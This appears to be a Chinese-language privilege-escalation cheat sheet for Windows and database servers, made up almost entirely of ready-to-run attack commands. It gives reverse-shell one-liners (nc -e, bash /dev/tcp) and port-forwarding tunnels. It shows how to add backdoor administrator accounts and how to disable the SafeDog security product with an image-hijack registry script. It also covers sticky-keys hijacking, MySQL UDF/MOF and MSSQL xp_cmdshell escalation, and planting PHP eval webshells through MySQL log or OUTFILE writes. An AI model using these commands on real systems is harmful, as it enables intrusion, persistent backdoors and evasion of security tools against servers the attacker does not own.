提权笔记

Windows Exp

CMD探查

信息探测类

systeminfo :查看系统版本信息

netstat -ano : 查看系统开放端口

tasklist /svc : 查看系统进程

ipconfig : 查看ip地址

whoami : 查看当前用户

net user : 查看计算机用户列表

net localgroup : 查看计算机用户组列表

wmic qfe get Caption,Description,HotFixID,InstalledOn :  查看安装补丁和时间信息

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:“KBxxxxxxx“ :  查看特定漏洞信息

添加用户类

net user username password /add : 添加用户并设置密码

net localgroup administrators username /add : 将用户加入管理组

net user guest /active:yes : 激活guest用户

net user guest username : 更改guest用户的密码

端口转发

反弹shell:

shell: nc -e cmd ip port
shell: bash -i >& /dev/tcp/ip/port 0>&1 (linux,ip:服务器)

服务器: nc -vv -lp port

端口转发:

shell: lcx -slave ip port 127.0.0.1 port
服务器: lcx -listen port 33891

ANTIFW.exe -s #运行程序,将3389转发到80
ANTIFW.exe -l #关闭程序,恢复iis

ew_for_Win.exe -s rcsocks -l 1080 -e 8888          #服务器
ew_for_Win.exe -s rssocks -d IP -e 8888            #目标 (ip:服务器)

Kill Dog

kill dog

1.安全狗默认只拦截加管理组,不拦截加用户
  法a:利用用户克隆exp:直接克隆administrator的权限
  法b:反弹shell读取管理员密码
  法c:改注册表替换安全狗的文件,然后重启服务器(redegit /s redegit.reg(redegit.reg见附录))安全狗关闭

2.安全狗账号防护最严程度:拦截添加用户
  法a:激活guest,然后克隆用户
  法b:反弹shell读取管理员密码
  法c:改注册表,重启服务器,关闭安全狗

redegit.reg脚本内容:

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SafeDogGuardCenter.exe]
"Debugger"="C:\WWW\l.php"

打开3389

开启方法:

1.通用开3389(优化后):
  wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

2.For Win2003:
  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.For Win2008:
  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

4.For Every:
  cmd开3389 win08 win03 win7 win2012 winxp

  win08,三条命令即可:
  wmic /namespace:\root\cimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
  wmic /namespace:\root\cimv2 erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
  win2012通用;win7前两条即可。权限需要run as administrator。

查询终端端口 :

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

(or) 终端端口:tasklist /svc查询TermService对应PID和netstat查询的PID对应的端口号
(or) 注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ Wds dpwd\Tds    cp 中PortNumber的值

SQL提权

1.UDF提权

UDF手工提权辅助:

select @@basedir;  #查看mysql安装目录
select 'It is dll' into dumpfile 'C:\。。lib::';  #利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\。。lib\plugin::';  #利用NTFS ADS创建plugin目录
select 0xUDFcode into dumpfile 'C:\phpstu\MySQL\lib\plugin\mstlab.dll';  #导出udfcode,注意修改udfcode
create function cmdshell returns string soname 'mstlab.dll';   #用udf创建cmd函数,shell,sys_exec,sys_eval
select cmdshell('net user');        #执行cmd命令
select shell('cmd','net user');     #执行cmd命令
show variables like '%plugin%';     #查看plugin路径

#利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\xxxxx\\mysql5.x\\lib::$INDEX_ALLOCATION';
#利用NTFS ADS创建plugin目录
select 'It is dll' into dumpfile 'C:\\xxxxx\\mysql5.x\\lib\\plugin::$INDEX_ALLOCATION';

小技巧:

1.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MySQL 注册表中ImagePath的值为mysql安装目录
2.my.ini中datadir的值是数据存放目录
3.UPDATE user set File_priv ='Y';  flush privileges; 强制加file权限

2.MOF提权

MOF手工提权辅助:

保存为 1.mof , 然后mysql执行:
select load_file('D:/wwwroot/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

注: mof提权只针对win 2008以下操作系统版本,对于win 2008及以上操作系统无效!

3.SA提权辅助:

1.判断扩展存储是否存在:
  select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'
  select count(*) from master.dbo.sysobjects where name='xp_regread'
  恢复:
  exec sp_dropextendedproc 'xp_cmdshell'
  exec sp_dropextendedproc xp_cmdshell,'xplog70.dll'
  EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;(SQL2005)

2.列目录:
  exec master..xp_cmdshell 'ver'
  (or) exec master..xp_dirtree 'c:\',1,1
  (or) drop table black
       create TABLE black(mulu varchar(7996) NULL,ID int NOT NULL IDENTITY(1,1))-- 
       insert into black exec master..xp_cmdshell 'dir c:\' 
       select top 1 mulu from black where id=1
    xp_cmdshell被删除时,可以用(4.a)开启沙盒模式,然后(4.b)方法提权

3.备份启动项:
  alter database [master] set RECOVERY FULL
  create table cmd (a image)
  backup log [master] to disk = 'c:\cmd1' with init
  insert into cmd (a) values (0x(batcode))
  backup log [master] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat'
  drop table cmd

4.映像劫持
  xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'

5.沙盒模式提权:
  法a:exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet.0\Engines','SandBoxMode','REG_DWORD',0; #关闭沙盒模式
  法b:Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user mstlab mstlab /add")'); #or c:\windows\system32\ias\dnary.mdb string类型用此。
开启OpenRowSet:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

6.xp_regwrite操作注册表
  exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion un','black','REG_SZ','net user test test /add'
  开启xp_oacreate:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

4.mysql写shell

1.日志写入:
    1、set global general_log='on';    
    2、set global general_log_file='c:\\xxx\\xxxx\\shell.php';   #一定使用 '\\'
    3、select "<?php eval($_POST[0])?>";

2.OUTFILE写入:
    CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
    INSERT INTO `mysql`.`xiaoma` (`xiaoma1`) VALUES ('<?php @eval($_POST[pass])?>');
    SELECT xiaoma1 FROM xiaoma INTO OUTFILE 'C:/xxx/xxx/WWW/shell.php';
    以上同时执行,在数据库:mysql下创建一个表名为:xiaoma,字段为xiaoma1,导出到C:/xxx/xxx/WWW/shell.php
帮助别人,快乐自己,打赏随意!